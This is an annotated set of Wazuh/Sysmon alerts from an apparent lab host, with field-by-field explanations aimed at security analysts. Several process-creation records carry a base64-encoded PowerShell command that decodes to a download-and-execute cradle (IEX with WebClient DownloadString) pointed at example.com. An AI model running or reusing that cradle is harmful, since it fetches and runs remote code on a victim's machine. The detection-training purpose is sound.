data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdb8-680a-b70b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 101 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534398.1943735 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:56.6620358Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285566 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:56.644
ProcessGuid: {94294ddc-bdbb-680a-b90b-000000000e00}
ProcessId: 12340
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pk3v0v2m.0ww.ps1
CreationUtcTime: 2025-04-24 22:39:56.644
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:56.644 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdbb-680a-b90b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12340 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pk3v0v2m.0ww.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:56.644 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 98 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534401.1946504 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:58.8999675Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285635 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:57.681
ProcessGuid: {94294ddc-bdbd-680a-bb0b-000000000e00}
ProcessId: 10672
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdbb-680a-b90b-000000000e00}
ParentProcessId: 12340
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:57.681 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdbd-680a-bb0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10672 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdbb-680a-b90b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12340 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 102 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534401.1954575 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:59.2948251Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285636 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:59.125
ProcessGuid: {94294ddc-bdbd-680a-bb0b-000000000e00}
ProcessId: 10672
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_1bx1rwm3.pc4.ps1
CreationUtcTime: 2025-04-24 22:39:59.125
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:59.125 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdbd-680a-bb0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10672 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1bx1rwm3.pc4.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:59.125 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 99 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534404.1957344 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:02.0874693Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285678 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:00.599
ProcessGuid: {94294ddc-bdc0-680a-bd0b-000000000e00}
ProcessId: 16112
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdbd-680a-bb0b-000000000e00}
ParentProcessId: 10672
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:00.599 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc0-680a-bd0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16112 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdbd-680a-bb0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10672 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 103 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534405.1965415 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:02.5743551Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285679 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
